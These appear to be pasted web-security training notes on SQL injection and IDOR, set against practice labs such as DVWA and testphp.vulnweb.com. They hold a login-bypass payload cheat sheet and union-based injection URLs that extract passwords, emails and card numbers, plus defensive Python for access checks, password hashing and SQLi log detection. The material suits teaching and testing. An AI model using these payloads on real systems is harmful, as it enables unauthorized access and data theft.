· 6 years ago · Jan 02, 2020, 04:18 PM
SQL Injection
=============
Authentication Bypass
---------------------
 To bypass the authentication on any login form and gain access as the administrator.
 There are 4 types of authentication:
 1. Basic Authentication
 2. Integrated Authentication
 3. Digest Authentication
 4. Form Based Authentication

Logic Gates
===========
AND Gate --> If any of the values is false, then the answer will be false

 0 and 0 = 0
 0 and 1 = 0
 1 and 0 = 0
 1 and 1 = 1

OR Gate --> If any of the values is true, then the answer will be true

 0 or 0 = 0
 0 or 1 = 1
 1 or 0 = 1
 1 or 1 = 1

1 ---> True ---> Administrator

' ---> Single inverted comma (single quote) ---> Used to break out of the string literal in the SQL query

1'or'1'='1
select '1'or'1'='1'

Username --> 1'or'1'='1 always true
Password --> 1'or'1'='1 always true
 Administrator Login
 x'or'x'='x ---> true

Coupons | Promo Code ---> 1'or'1'='1


Cheat sheet
===========
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

http://www.snvmpgcollege.com

EVS setup
=========
Euinac Vulnerable Simulator
===========================

DVWA --> Damn Vulnerable Web Application
----------------------------------------
 Open Source

LVS_1.zip
1. Copy the zip file
2. Paste it in C:\xampp\htdocs
3. Extract the zip file
 LVS_1
4. Start the xampp server
 Apache
 MySQL
5. Start the browser
 127.0.0.1/lvs_1
6. Click on the link --> lvs111

SESSION 10
==========

METHODS USED IN WEB APPLICATIONS
================================

1. GET - This method is considered insecure because all the data transmitted from the web application UI to its server or database is visible in the URL. It requests data from a specified resource.
eg. php?id=1, ?cat=54, ?test=query.

2. POST - This method sends the data to the server or database hidden in the request body rather than in the URL, so it is not displayed. eg. twitter.com/login.php

----------------------------------------------------------

INSECURE DIRECT OBJECT REFERENCE
================================
A direct object reference occurs when a developer exposes a reference to an internal implementation object such as a file, directory or database key. Without an access control check or other protection, attackers can directly access unsecured files, configurations and settings that the administrator never authorized or validated for them.

For eg. :

CHJM Website :

Accessing another user's account -
www.chjm.org/login/.../php?id=alex
www.chjm.org/login/../php?id=logan ( entered into Logan's account)

Accessing pages which a basic user is not authorized to see -
www.chjm.org/user+profile -- /../settings/config.html

www.chjm.org/login/../php?id=logan/settings/config.html

- Demo in WAVE.
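The access control check that the ?id=alex / ?id=logan example above is missing, as an added Python example that is not part of the notes or of any real site: the profile records, account names and roles are constructed for the demo. It places the vulnerable lookup beside two fixes, an ownership-or-role check on the direct reference, and a per-session indirect reference that never exposes the real key in the URL at all.

```python
import secrets

# Constructed sample data for the demo (not from the notes): profiles keyed by
# the id that appears in the URL (?id=alex, ?id=logan) plus a role per account.
PROFILES = {
    "alex":  {"email": "alex@example.invalid",  "role": "user"},
    "logan": {"email": "logan@example.invalid", "role": "user"},
    "sam":   {"email": "sam@example.invalid",   "role": "admin"},
}


class Forbidden(Exception):
    """Raised when the logged-in user is not entitled to the requested object."""


def profile_idor(session_user, requested_id):
    """Vulnerable pattern: the id from the URL is used as the lookup key with
    no check that the logged-in user is entitled to that record, so changing
    ?id=alex to ?id=logan shows Logan's profile to Alex."""
    return PROFILES[requested_id]


def profile_checked(session_user, requested_id):
    """Fixed pattern: honour the reference only when the logged-in user owns
    the record or holds the admin role. Unknown ids raise KeyError as before."""
    record = PROFILES[requested_id]
    is_owner = session_user == requested_id
    is_admin = PROFILES[session_user]["role"] == "admin"
    if not (is_owner or is_admin):
        raise Forbidden(f"{session_user} may not view profile {requested_id}")
    return record


def can_view_profile(session_user, requested_id):
    """True when profile_checked would return the record."""
    try:
        profile_checked(session_user, requested_id)
        return True
    except (Forbidden, KeyError):
        return False


def settings_page(session_user):
    """The settings/config.html case: a page a basic user must not reach.
    The gate is the role of the session, not whether the URL can be guessed."""
    if PROFILES[session_user]["role"] != "admin":
        raise Forbidden(f"{session_user} may not open settings")
    return "settings/config.html"


def can_open_settings(session_user):
    """True when settings_page would succeed for this session."""
    try:
        settings_page(session_user)
        return True
    except Forbidden:
        return False


class IndirectReferences:
    """Alternative defence: give the browser a random per-session handle in
    place of the real key. A handle is issued only for objects the session is
    allowed to see, and resolves only within the session that issued it."""

    def __init__(self, session_user):
        self.session_user = session_user
        self._handles = {}

    def issue(self, object_id):
        if not can_view_profile(self.session_user, object_id):
            raise Forbidden(f"{self.session_user} may not reference {object_id}")
        handle = secrets.token_urlsafe(8)
        self._handles[handle] = object_id
        return handle

    def resolve(self, handle):
        """Return the profile for a handle this session issued, else None."""
        object_id = self._handles.get(handle)
        return PROFILES[object_id] if object_id is not None else None


if __name__ == "__main__":
    print("IDOR, alex asks for logan:", profile_idor("alex", "logan")["email"])
    print("checked, alex asks for logan:", can_view_profile("alex", "logan"))
    print("checked, sam (admin) asks for logan:", can_view_profile("sam", "logan"))
    print("alex opens settings:", can_open_settings("alex"))
```

The point of the indirect form is that a handle copied from one session is meaningless in another, so there is nothing in the URL for a user to increment or swap.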

-------------------------------------------------------------------------------------------

SENSITIVE DATA EXPOSURE
=======================
Many web applications do not properly protect sensitive data such as names, IDs, credit card details, authentication credentials etc. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or other crimes. Such sensitive data is also expected to be encrypted: if it is not encrypted and is stored in plain text, it is much easier for an attacker or any other individual to fetch.

Types of Sensitive Data
=======================

1. Personal - Names, Address, Contact Numbers etc.
2. Confidential - ID, Passwords - Credentials, Aadhaar No.
3. Financial - Bank Account numbers, credit cards, debit cards etc.
4. Health Information - Policies, insurances etc.

Demonstration on LVS.
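The credentials case from the list above, as an added Python example that is not from the notes: the users tables dumped later in these notes hold user and password side by side, and the 81dc9bdb52d04dc20036dbd8313ed055 value in the cheat sheet is the unsalted MD5 of the string 1234, which is why it can be substituted for a real password. The script shows that weak storage form next to the one a developer should use: PBKDF2-HMAC-SHA256 with a random per-user salt, verified in constant time. The iteration count and the record format are this example's own assumptions.

```python
import base64
import hashlib
import hmac
import os

# Assumption for this example: a PBKDF2-HMAC-SHA256 work factor. The stored
# record carries the count, so it can be raised later without breaking logins.
ITERATIONS = 600_000
SALT_BYTES = 16


def unsalted_md5(password):
    """The storage form behind the cheat sheet's hash: MD5 with no salt.
    Equal passwords give equal hashes, and short inputs are found instantly
    by lookup, so a dumped row is as good as the plain-text password."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return a self-describing record: algorithm$iterations$salt$hash.
    A fresh random salt per user means two users with the same password get
    different records and no precomputed table applies."""
    salt = salt if salt is not None else os.urandom(SALT_BYTES)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (
        iterations,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(dk).decode("ascii"),
    )


def verify_password(password, record):
    """Recompute the hash from the stored salt and iteration count and compare
    in constant time. Malformed or foreign records are rejected, never
    accepted by accident."""
    try:
        algo, iterations, salt_b64, dk_b64 = record.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(dk_b64)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(dk, expected)


if __name__ == "__main__":
    print("md5('1234')    =", unsalted_md5("1234"))  # the cheat sheet value
    record = hash_password("1234")
    print("stored record  =", record)
    print("verify '1234'  =", verify_password("1234", record))
    print("verify '12345' =", verify_password("12345", record))
    print("same password, different record:", hash_password("1234") != record)
```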

----------------------------------------------------------

DVWA SETUP AND CONFIGURATION
============================
DVWA stands for Damn Vulnerable Web Application. It is a PHP/MySQL based web application built for organised, hands-on understanding of the OWASP TOP 10, like LVS.

STEPS
=====
Copy the zip file into C:\xampp\htdocs
Right click the zip file, click on “extract here”
Start the xampp server, start Apache and MySQL
Go to the directory of dvwa in “htdocs”, navigate to the folder config, open the config.php file and set password=”” (empty).
Open the browser, go to 127.0.0.1/dvwa
It will show you a message “Click here to create the Database”.
After clicking, your database has been created; “127.0.0.1/phpmyadmin” lists out all the databases.
Go through the Instruction Page of LVS and then start learning through it.

----------------------------------------------------------

OWASP A1. INJECTIONS
=====================

id=1

Select * from anything where id=1;

SQL Injection

 1. Union Based
 2. Error Based
 3. Time Based / Boolean Based

UNION BASED SQL INJECTION
=========================

 information_schema

UNION BASED SQLI is a type of attack vector in which an attacker enters SQL syntax into an input method of a web application UI and is thereby able to communicate with and access the database.
The attacker extracts the data by entering SQL queries into the web application UI and hence gets the “juicy” data from Database -> Tables -> Columns -> Rows.

TERMINOLOGIES
=============
1. Information Schema : It holds all of the data regarding every database, table, column and every other detail of the database server. It is considered the mother of all information in the database.
2. --+ : Comments out the rest of the original query, so only what is written before --+ is executed as the SQL query (the + becomes a space in the URL, which MySQL requires after -- for it to count as a comment).
3. # : Everything entered after # will not be considered (it is also a comment marker).
4. database() - name of the current database.
5. version() - version of the database server.

column_name
table_name

= order by - sorts the result rows by a column (by column number here); used to find out how many columns the query returns.
= union select - combines the rows of more than one select into a single result set, one after the other.
 join + extract
= group_concat - groups the values of a column from many rows and adds them together into one string.
 concatenation = addition (joining strings end to end)

Target - http://127.0.0.1/dvwa/vulnerabilities/sqli/

STEPS - For SQLi it is always recommended to use Firefox, as special symbols and spaces typed in the address bar do not get converted into URL encoding.

Union Based SQL Injection :

STEPS
======

Step 1: To find the GET Method/Parameter
 eg. php?id=1
 ?cat=24
 ?test=query
Try clicking each and every possible link, or give inputs to the search boxes that use the GET method.

 “http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1&Submit=Submit#”

Step 2: Check whether the site is vulnerable to Union Based SQLI or not
 ?id=1'
 php?id=1'

 The extra quote leaves an unbalanced string literal, which the error message shows as ''1''':

 Select * from anything where id='1''

 Select * from anything where id =2

 Select * from anything where id =1'

 Select * from anything where id=1 order by 10

Unknown column '10' in 'order clause'

If we get an error, that means the website is vulnerable to Union Based SQLI.

It will give - “http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' &Submit=Submit#
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 “

Step 3: To check the number of columns returned by the query
 order by 100--+
 order by 200--+
 order by 300--+
 Until we get an error of “Unknown column ... in 'order clause'”.

Eg. 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
Unknown column '3' in 'order clause'

There are two columns in the query (order by 2 works, order by 3 errors).

http://localhost/dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%201,%20table_name%20from%20Information_schema.tables--+&Submit=Submit#

localhost/dvwa/vulnerabilities/sqli/?id=1' union select 1, column_name from Information_schema.columns --+&Submit=Submit#

Step 4: To union select the columns found in step 3 and see which of them is reflected on the page (vulnerable)
 union select 1,2--+

http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select 1,2--+ &Submit=Submit#

Step 5: Extracting information from the database
 - database()
 - version()
 - union select version(),2--+
 - union select 1,version()--+

 - union select all 1,version()--+ : 10.1.25-MariaDB
 - union select all 1,database()--+ : dvwa

Step 6: Calling the Mother of the Database - information_schema

= Extracting Table Names
 - union select all 1,table_name from information_schema.tables--+

http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select all 1,table_name from information_schema.tables--+&Submit=Submit#

= After selecting a juicy table, extracting the column names of that table :
 - column_name, information_schema.columns

 - union select all 1, column_name from information_schema.columns where table_name="users"--+

= To get the data from the columns (user, password)

 - union select user,password from users--+
 - http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select group_concat(user,0x0a,password),2 from users--+&Submit=Submit#

And we will get the Juicy Data.
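Seen from the server side, the six steps above leave a very recognisable trail in the access log. As an added example that is not part of the notes, the following Python script reads web-server log lines (constructed for the demo, mirroring the probe sequence above), URL-decodes the query string (the %27 in the URLs above is the encoding of the single quote, and --+ decodes to "-- ") and flags requests carrying the patterns used in the steps: the order by count, union select, information_schema references, comment terminators and the quote-or-quote tautology. The rule set is this example's own starting point, not a production WAF or SIEM signature, and would need tuning for real traffic.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines for the demo (not real traffic). The encoded
# requests mirror the probe sequence described in the steps above.
LOG_LINES = [
    '127.0.0.1 - - [02/Jan/2020:16:18:01 +0530] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1534',
    '127.0.0.1 - - [02/Jan/2020:16:18:09 +0530] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20order%20by%203--+&Submit=Submit HTTP/1.1" 200 1102',
    '127.0.0.1 - - [02/Jan/2020:16:18:20 +0530] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%201,table_name%20from%20information_schema.tables--+&Submit=Submit HTTP/1.1" 200 2890',
    '127.0.0.1 - - [02/Jan/2020:16:19:03 +0530] "POST /login.php?username=1%27or%271%27%3D%271&password=x HTTP/1.1" 302 0',
    '127.0.0.1 - - [02/Jan/2020:16:19:40 +0530] "GET /search.php?q=O%27Brien HTTP/1.1" 200 880',
]

# (name, pattern, view): "norm" rules run on the query with inline /*...*/
# comments collapsed (a keyword-splitting trick), "raw" rules on the query
# exactly as decoded so the comment itself is still reported.
RULES = [
    ("tautology",          re.compile(r"'\s*or\s*'[^']*'\s*=\s*'|\bor\s+\d+\s*=\s*\d+", re.I), "norm"),
    ("order-by-probe",     re.compile(r"\border\s+by\s+\d+", re.I), "norm"),
    ("union-select",       re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I), "norm"),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I), "norm"),
    ("comment-terminator", re.compile(r"--(?:\s|$)|#|/\*"), "raw"),
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def decode_query(url):
    """Return the query string as the server sees it after URL decoding:
    %27 -> ', %20 and + -> space, %3D -> =."""
    return unquote_plus(urlsplit(url).query)


def scan_query(url):
    """Return the names of the rules that match this request, in RULES order."""
    raw = decode_query(url)
    norm = re.sub(r"/\*.*?\*/", " ", raw)
    return [name for name, rx, view in RULES
            if rx.search(raw if view == "raw" else norm)]


def scan_log(lines):
    """Return (url, hits) for every log line whose request matches a rule.
    A plain quote on its own (O'Brien) is deliberately not a hit."""
    flagged = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = scan_query(match.group(1))
        if hits:
            flagged.append((match.group(1), hits))
    return flagged


if __name__ == "__main__":
    for url, hits in scan_log(LOG_LINES):
        print(", ".join(hits).ljust(45), decode_query(url))
```

Anchoring the rules on the decoded query is what makes them hold up: matching the raw %27 text instead would miss every request a browser encodes differently from Firefox.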

-------------------------------------------------------------------------------

TESTING WEBSITES
================
1. http://demo.testfire.net/
2. http://testphp.vulnweb.com/

TASKS
=====
1. What is the meaning of % in a URL?
2. What is a WAF?

-------------------------------------------------------------------------------


http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(uname),3 from users

group_concat(user,0x0a,password) from users

 http://testphp.vulnweb.com/artists.php
 http://testphp.vulnweb.com/artists.php?artist=1
 http://testphp.vulnweb.com/artists.php?artist=1 order by 1
 http://testphp.vulnweb.com/artists.php?artist=1 order by 3
 http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,version(),current_user()
 http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database()
 http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
 http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(pass),3 from users
 http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(email),3 from users
 http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(cc),3 from users
 http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,pass,cc from users where uname="test"

 column_name from information_schema.columns where table_name="users"

group_concat(table_name) from information_schema.tables where table_schema=database()

group_concat()

 1
 1'
 order by 1
 order by 2
 union select 1,2 --+
 union select 1,database()--+
 id=1'union select 1,table_name from information_schema.tables--+
 id=1'union select 1,column_name from information_schema.columns--+
 union select 1,group_concat(pass),3 from users